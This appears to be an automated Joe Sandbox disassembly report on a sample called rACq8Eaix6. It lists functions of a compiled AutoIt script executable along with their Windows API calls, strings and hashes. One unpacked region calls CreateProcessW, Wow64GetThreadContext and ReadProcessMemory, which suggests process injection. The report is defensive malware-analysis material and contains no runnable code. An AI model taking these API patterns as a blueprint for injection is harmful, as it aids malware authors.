LoadIconW.USER32(000000A2), ref: 00BD3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BD3AC0
RegisterClassExW.USER32(?), ref: 00BD3B16

Part of subcall function 00BD3041: GetSysColorBrush.USER32(0000000F), ref: 00BD3074
Part of subcall function 00BD3041: RegisterClassExW.USER32(00000030), ref: 00BD309E
Part of subcall function 00BD3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BD30AF
Part of subcall function 00BD3041: InitCommonControlsEx.COMCTL32(?), ref: 00BD30CC
Part of subcall function 00BD3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BD30DC
Part of subcall function 00BD3041: LoadIconW.USER32(000000A9), ref: 00BD30F2
Part of subcall function 00BD3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BD3101

Strings

AutoIt v3, xrefs: 00BD3B05
#, xrefs: 00BD3AFB
0, xrefs: 00BD3AF4

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d289d54abcd5f08a713b8d48b9e8e51a9305d4a6db022fe801fb53044563fc38
Instruction ID: 974d978be143f2eee441d3be4556f6122872a0a6694508d06404d456ae7a63c8
Opcode Fuzzy Hash: d289d54abcd5f08a713b8d48b9e8e51a9305d4a6db022fe801fb53044563fc38
Instruction Fuzzy Hash: 3C211775900B08AFEB16DFA4EC49B9D7BF4EB08B11F10016AE504A62A1D7B55A50CF94

Function 00BD3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00BD36D2
KillTimer.USER32(?,00000001), ref: 00BD36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BD371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BD372A
CreatePopupMenu.USER32 ref: 00BD373E
PostQuitMessage.USER32(00000000), ref: 00BD374D

Strings

TaskbarCreated, xrefs: 00BD3725

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 9cfc0736f71219c2c59a4c0d6cc39e2d78756a53e256178e68c9e0275817b4bd
Instruction ID: 852933776e30f94820773eff114e51aeab5faf5457cb916eb524bf2d62f12b3b
Opcode Fuzzy Hash: 9cfc0736f71219c2c59a4c0d6cc39e2d78756a53e256178e68c9e0275817b4bd
Instruction Fuzzy Hash: BC4122B5204A05ABDF156F68DC4DB7D7BD8EB04B00F1401ABF502963E3EA709E81D766

Function 00BD3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00BD37AE
CMDLINERAW, xrefs: 00BD37FB
/AutoIt3OutputDebug, xrefs: 00BD3892
/AutoIt3ExecuteLine, xrefs: 00BD38A7
/ErrorStdOut, xrefs: 00BD387D
/AutoIt3ExecuteScript, xrefs: 00BD38BC
CMDLINE, xrefs: 00BD3822

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 389289fb82d37c17328cd79d6e18889504a991efdb35b08ba6848e569ea12b56
Instruction ID: d3085c83419b46d5795b68e4f7c14f4123157bd246a4947594e2173573fb452f
Opcode Fuzzy Hash: 389289fb82d37c17328cd79d6e18889504a991efdb35b08ba6848e569ea12b56
Instruction Fuzzy Hash: E6A15D7190061D9BCF05EBA4DC95AEEF7F8BF14710F0404AAE416A7292FF745A08CB61

Function 0181BA00 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0181BAD1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0181BCF7

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: b7af1cce2a56d638a8ba19803fa5faf057cb29af7644a72720aa6ef4d461190d
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 2AA11A75E00209EBDB14CFA8C994BEEBBB9FF48304F208559E505BB284DB759A41CF54

Function 00BD39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BD3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BD3A24
ShowWindow.USER32(00000000,?,?), ref: 00BD3A38
ShowWindow.USER32(00000000,?,?), ref: 00BD3A41

Strings

edit, xrefs: 00BD3A1E
AutoIt v3, xrefs: 00BD39FB, 00BD3A00, 00BD3A01

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 319316479805abe84145c8390282eb62f21d5f4dbc9745b16fadd10037f744bc
Instruction ID: d6d9f9efab4034fba28bb1c81df9034a566b9131060a83293179be116859e633
Opcode Fuzzy Hash: 319316479805abe84145c8390282eb62f21d5f4dbc9745b16fadd10037f744bc
Instruction Fuzzy Hash: 8BF03A78500A907EEA3257236C0CF2F3E7DD7CAF51B01002EB900A21B0C6611841DBB0

Function 0181B7C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0181B6B0: Sleep.KERNELBASE(000001F4), ref: 0181B6C1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0181B8ED

Strings

27XL0I15O6, xrefs: 0181B950, 0181B953

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID: CreateFileSleep
String ID: 27XL0I15O6
API String ID: 2694422964-1128342383
Opcode ID: 4b78fcbd65efbfe5365925233d764b1effd6a42754ff8854788afdba65621260
Instruction ID: ec21aed823f8c355071268eaa88bb1ab9d43d8c5fc4ddad0fdee44ecca37a3ee
Opcode Fuzzy Hash: 4b78fcbd65efbfe5365925233d764b1effd6a42754ff8854788afdba65621260
Instruction Fuzzy Hash: A6519D31D0024DEBEB11DBB4C855BEEBB79AF18700F104599E608FB2C0E6790B45CBA6

Function 00BD407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C0D3D7

Part of subcall function 00BD7BCC: _memmove.LIBCMT ref: 00BD7C06

_memset.LIBCMT ref: 00BD40FC
_wcscpy.LIBCMT ref: 00BD4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BD4160

Strings

Line: , xrefs: 00C0D400

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 6adb5c3e50b0c05c01f65fd61517948716ab603f07f1d27e7f382044ab750367
Instruction ID: 5f332f20bac9ddaead1ff52e1f5c613d5992bf4a88b90955a79c97582cab6828
Opcode Fuzzy Hash: 6adb5c3e50b0c05c01f65fd61517948716ab603f07f1d27e7f382044ab750367
Instruction Fuzzy Hash: CB318F71048705AFD721EB60DC4ABEBB7E8AB44304F10456FF685922A1FF709648C796

Function 00BD686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BD4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BD4E0F

_free.LIBCMT ref: 00C0E263
_free.LIBCMT ref: 00C0E2AA

Part of subcall function 00BD6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BD6BAD

Strings

Bad directive syntax error, xrefs: 00C0E292
>>>AUTOIT SCRIPT<<<, xrefs: 00C0E039

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 986fa38a54544430f4fbd33021180e6823f311a5b9981c1e8565322406c647d1
Instruction ID: cb67cd48e26d272a886498a948b47eda8de191ede0c40bb3f83f3732ed16a467
Opcode Fuzzy Hash: 986fa38a54544430f4fbd33021180e6823f311a5b9981c1e8565322406c647d1
Instruction Fuzzy Hash: 7D918F71950219EFCF14EFA4CC919EDB7B8FF18314F10486AF815AB2A1EB70AA45DB50

Function 00BD35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00BD35A1,SwapMouseButtons,00000004,?), ref: 00BD35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00BD35A1,SwapMouseButtons,00000004,?,?,?,?,00BD2754), ref: 00BD35F5
RegCloseKey.KERNELBASE(00000000,?,?,00BD35A1,SwapMouseButtons,00000004,?,?,?,?,00BD2754), ref: 00BD3617

Strings

Control Panel\Mouse, xrefs: 00BD35D2

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 21c8af0e1f8b7c380a8a1f135edede7c2c541995ec04715968fdd35477b31625
Instruction ID: eec8cd9765c417d2e643b2d625d1a444bf61eb699990f56d59781d9cb5cc0b2c
Opcode Fuzzy Hash: 21c8af0e1f8b7c380a8a1f135edede7c2c541995ec04715968fdd35477b31625
Instruction Fuzzy Hash: C2113679514208BADB208F64DC80EAEB7E8EF44B40F0044AAA805E7211E2719E419761

Function 0181A6B0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0181AE6B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0181AF01
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0181AF23

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction ID: bd489ce0d91ab2259773fdb1bc85391c8b5cc9f82b872883461f3ad3e70a6da3
Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
Instruction Fuzzy Hash: 52620A31A14658DBEB24CFA4C850BDEB376EF58300F1091A9D20DEB294E7799E81CB59

Function 00C3955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00BD4EE5: _fseek.LIBCMT ref: 00BD4EFD

Part of subcall function 00C39734: _wcscmp.LIBCMT ref: 00C39824
Part of subcall function 00C39734: _wcscmp.LIBCMT ref: 00C39837

_free.LIBCMT ref: 00C396A2
_free.LIBCMT ref: 00C396A9
_free.LIBCMT ref: 00C39714

Part of subcall function 00BF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00BF9A24), ref: 00BF2D69
Part of subcall function 00BF2D55: GetLastError.KERNEL32(00000000,?,00BF9A24), ref: 00BF2D7B

_free.LIBCMT ref: 00C3971C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 94f71bd218a64b5daa7a85ec6a0e06ef3c2e02b7aba5b08e2402f4f95016de06
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: E8514DB5D14258AFDF249F64CC85AAEBBB9EF48300F1044AEF609A3351DB715A84CF58

Function 00BF470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BF47A0
__flush.LIBCMT ref: 00BF47C0
__write.LIBCMT ref: 00BF47F3
__flsbuf.LIBCMT ref: 00BF4821

Part of subcall function 00BF8B28: __getptd_noexit.LIBCMT ref: 00BF8B28

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 12b65393f8fba6d5623ad710bfe5615a1d781109d871e8fe367435b5bece400d
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: A541C475B0074E9BDB18DE69C8809BF7BE5EF423A0B2485BDEA15C7650EB70DD488B40

Function 00BD44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BD44CF

Part of subcall function 00BD407C: _memset.LIBCMT ref: 00BD40FC
Part of subcall function 00BD407C: _wcscpy.LIBCMT ref: 00BD4150
Part of subcall function 00BD407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BD4160

KillTimer.USER32(?,00000001,?,?), ref: 00BD4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BD4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C0D4B9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: ba958770c0ebb9b11a1cfbe979a25794ab9da7a59afc81b7d9ad1ead5e129880
Instruction ID: f6af267c470c588db0e0020678f8ea9623bd6521a8e82ec1e37a55cc4d9ee2e9
Opcode Fuzzy Hash: ba958770c0ebb9b11a1cfbe979a25794ab9da7a59afc81b7d9ad1ead5e129880
Instruction Fuzzy Hash: DE21F574504784AFE7328BA49859BEAFBECDB15308F0400DEE79E66281D3746A84CB41

Function 00BD7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C0EA39
GetOpenFileNameW.COMDLG32(?), ref: 00C0EA83

Part of subcall function 00BD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD4743,?,?,00BD37AE,?), ref: 00BD4770

Part of subcall function 00BF0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BF07B0

Strings

X, xrefs: 00C0EA51

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: e7d6f5ae428077e4b8e2bfe5771ef224722106e5b0a3e6a9a19171830a6ec591
Instruction ID: 6bf0ee723953f00454698aff00559ff1aae48dbb38e353739fa26b135b9f382e
Opcode Fuzzy Hash: e7d6f5ae428077e4b8e2bfe5771ef224722106e5b0a3e6a9a19171830a6ec591
Instruction Fuzzy Hash: 3E219371A102489BCF519F94CC45BEEBBF8AF49714F04409AE508A7381EFB4598DDFA1

Function 00C398E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C398F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C3990F

Strings

aut, xrefs: 00C39909

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 05cbc3ad02c68fb64edfd72cd223446d43fc4c82d63c13f9b950293d87027db0
Instruction ID: 4a3d2b5ca11c61f060d65f4b1c76537fb405161b5b36a3c7498d59811424fc4b
Opcode Fuzzy Hash: 05cbc3ad02c68fb64edfd72cd223446d43fc4c82d63c13f9b950293d87027db0
Instruction Fuzzy Hash: 14D05EB958030DABDB50ABA0DC0EF9A773CE704705F4002B1BA94A60A1EAB095998B95

Function 00C4CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73109cfa641599cf42b85fde3c4663bef18030f40f0d687dc0c921d5b61f9f2b
Instruction ID: cf354e8780d3dbf68db3fe189da232d02f2f78bc6bf900a0b579002fc246d1c0
Opcode Fuzzy Hash: 73109cfa641599cf42b85fde3c4663bef18030f40f0d687dc0c921d5b61f9f2b
Instruction Fuzzy Hash: C5F14770A083019FCB54DF28C480A6ABBE5FF88314F14896EF8A99B351D735E945CF82

Function 00BDF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF0193
Part of subcall function 00BF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF019B
Part of subcall function 00BF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF01A6
Part of subcall function 00BF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF01B1
Part of subcall function 00BF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF01B9
Part of subcall function 00BF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF01C1

Part of subcall function 00BE60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BDF930), ref: 00BE6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BDF9CD
OleInitialize.OLE32(00000000), ref: 00BDFA4A
CloseHandle.KERNEL32(00000000), ref: 00C145C8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
